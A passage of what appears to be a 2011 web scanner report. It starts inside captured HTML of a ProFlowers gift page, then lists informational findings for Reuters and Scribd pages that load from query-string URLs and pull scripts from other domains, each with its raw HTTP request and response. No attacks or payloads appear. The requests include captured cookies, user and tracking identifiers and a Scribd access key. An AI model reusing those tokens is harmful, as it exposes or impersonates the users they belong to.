.com/gifts/Rolling-Backpacks-30020599?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=4&trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Rolling Backpacks" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-3_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ifts/Aluminum-Sports-Bottles-30019101?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=5&trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Aluminum Sports Bottles" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/Baby-Information-Art-Canvas-30047164?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=1&trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Baby Information Art Canvas" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
gers--Ten-Toes-Picture-Frame-30021841?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=2&trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Ten Fingers & Ten Toes Picture Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ns.com/gifts/Baby-Name-Frame-30015464?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=3&trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Baby Name Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
olstered-Rocker-with-Ottoman-30017015?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=4&trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Upholstered Rocker with Ottoman" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
om/gifts/Baby-Alphabet-Quilt-30016554?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=5&trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Baby Alphabet Quilt" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
s/Heart-in-Sand-Framed-Print-30021311?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=1&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Heart in Sand Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Tub-with-Stand-30021145?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=2&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Galvanized Beverage Tub with Stand" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
strial-Alphabet-Framed-Print-30019088?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=3&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Architectural Alphabet Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
-Wedding--Anniversary-Afghan-30020974?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=4&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Heartwarming Wedding & Anniversary Afghan" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ed-Photography-Framed-Prints-30019837?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=5&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Wine Inspired Photography Framed Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_2.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
er Your Email Here
                   " id="_ctl11__ctl0_emailInput" class="textBox" onclick="javascript:this.value='';" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" />
<img onclick="SetEmailEntryUrl()" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif" alt="Sign Up for Email Savings" border="0" />
</div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="margin-left:5px;margin-top:-1px;vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">My Account</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">Order Tracking</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">Reminder Service</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/Careers_Overview.aspx">Careers</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/privacy.aspx">Privacy & Security</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/terms.aspx">Terms Of Use</a>
...[SNIP]...
<li><a border="0" href="http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm" target="_blank">View Catalog Online</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf" target="_blank">Apparel Size Charts</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf" target="_blank">Ring Size Charts</a>
...[SNIP]...
</p>
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:120px;"><img class="footerLogo_PFC" height=35px width=120px class="footerLogo_PFC" height="35px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:110px;"><img class="footerLogo_PLA" height=35px width=110px class="footerLogo_PLA" height="35px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:128px;"><img class="footerLogo_PFCint" height=35px width=128px class="footerLogo_PFCint" height="35px" width="128px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:151px;"><img class="footerLogo_RED" height=35px width=151px class="footerLogo_RED" height="35px" width="151px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:160px;"><img class="footerLogo_CMF" height=35px width=160px class="footerLogo_CMF" height="35px" width="160px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
...[SNIP]...
life...s special occasions." border="0" href="http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:177px;"><img class="footerLogo_PCR" height="35px" width="177px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:83px;"><img class="footerLogo_SHB" height=35px width=83px class="footerLogo_SHB" height="35px" width="83px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="OtherBrands XSmallSize">
           Other Liberty Media Brands and Services:
           <a id="_ctl11__ctl0_FooterLink_berries" href="http://www.berries.com/">Hand-Dipped Strawberries</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<br/><a class="Underlined" onclick="" href="http://www.facebook.com/personalcreations">Personal Creations Facebook</a><br/><a class="Underlined" onclick="" href="http://twitter.com/pcgifts">Personal Creations Twitter</a><br/><a class="Underlined" onclick="" href="http://www.linkedin.com/company/personal-creations">Personal Creations Linked-In</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...

18.29. http://www.reuters.com/assets/commentsChild previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/commentsChild

Issue detail

The page was loaded from a URL containing a query string:

http://www.reuters.com/assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base

The response contains the following links to other domains:

http://connect.facebook.net/en_US/all.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:34 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:45:00 GMT
Age: 274
Vary: Accept-Encoding
Content-Length: 5292
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:45:00 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.30. http://www.reuters.com/assets/newsFlash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/newsFlash

Issue detail

The page was loaded from a URL containing a query string:

http://www.reuters.com/assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/

The response contains the following link to another domain:

http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:27 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:47:39 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Age: 48
Vary: Accept-Encoding
Content-Length: 10669
Content-Type: text/html;charset=UTF-8



<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:47:39 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...

18.31. http://www.scribd.com/embeds/63688924/content previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scribd.com
Path:	/embeds/63688924/content

Issue detail

The page was loaded from a URL containing a query string:

http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=9304646&cv=2.0&cj=1
http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/pixel/p-13DPpb-yg8ofc.gif
http://s6.scribdassets.com/aggregated/css/base.css?1314908997
http://s6.scribdassets.com/aggregated/javascript/base.js?1314908997
http://s6.scribdassets.com/favicon.ico
http://s7.scribdassets.com/aggregated/css/fragments.css?1314908997
http://s7.scribdassets.com/aggregated/css/web.css?1314908997
http://twitter.com/home?source=scribd.com&status=Reading%20%22Summary%20of%20%20State%20Collective%20Bargaining%20Agreements%20%22%20on%20Scribd%20http%3A%2F%2Fwww.scribd.com%2Fdoc%2F63688924%20%23Readcast
http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.scribd.com%2Fdoc%2F63688924%2FSummary-of-State-Collective-Bargaining-Agreements%23source%3Afacebook
http://www.quantcast.com/p-13DPpb-yg8ofc

Request

GET /embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:55:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 53ms
Status: 200 OK
Age: 114539
X-Cache: HIT from squid03.local
Via: 1.1 squid03.local:3128 (squid/2.7.STABLE9)
Expires: Sun, 04 Sep 2011 00:55:47 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 9396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<base target="_top" />

<link href="http://s6.scribdassets.com/aggregated/css/base.css?1314908997" media="screen" rel="stylesheet" type="text/css" />
<link href="http://s7.scribdassets.com/aggregated/css/web.css?1314908997" media="screen" rel="stylesheet" type="text/css" />
<link href="http://s7.scribdassets.com/aggregated/css/fragments.css?1314908997" media="screen" rel="stylesheet" type="text/css" />


...[SNIP]...
<div class="share_item"><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.scribd.com%2Fdoc%2F63688924%2FSummary-of-State-Collective-Bargaining-Agreements%23source%3Afacebook"><div class="share_button" id="share_on_facebook">
...[SNIP]...
<div class="share_item"><a href="http://twitter.com/home?source=scribd.com&status=Reading%20%22Summary%20of%20%20State%20Collective%20Bargaining%20Agreements%20%22%20on%20Scribd%20http%3A%2F%2Fwww.scribd.com%2Fdoc%2F63688924%20%23Readcast"><div class="share_button" id="share_on_twitter">
...[SNIP]...


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-13DPpb-yg8ofc" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-13DPpb-yg8ofc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=9304646&cv=2.0&cj=1" />
</noscript>
...[SNIP]...

18.32. http://www.scribd.com/embeds/63688924/content_inner previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scribd.com
Path:	/embeds/63688924/content_inner

Issue detail

The page was loaded from a URL containing a query string:

http://www.scribd.com/embeds/63688924/content_inner?start_page=1

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=9304646&cv=2.0&cj=1
http://edge.quantserve.com/quant.js
http://fonts1.scribdassets.com/static/4gen.css?1314662118
http://fonts1.scribdassets.com/static/4gen_non_ie.css?1314662118
http://fonts4.scribdassets.com/static/4gen.js?1314662118
http://pixel.quantserve.com/pixel/p-13DPpb-yg8ofc.gif
http://s6.scribdassets.com/aggregated/css/base.css?1314908997
http://s6.scribdassets.com/aggregated/javascript/base.js?1314908997
http://s6.scribdassets.com/favicon.ico
http://s7.scribdassets.com/aggregated/css/fragments.css?1314908997
http://s7.scribdassets.com/aggregated/css/web.css?1314908997
http://www.quantcast.com/p-13DPpb-yg8ofc

Request

GET /embeds/63688924/content_inner?start_page=1 HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:59:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 30ms
Status: 200 OK
Age: 103946
X-Cache: HIT from squid01.local
Via: 1.1 squid01.local:3128 (squid/2.7.STABLE9)
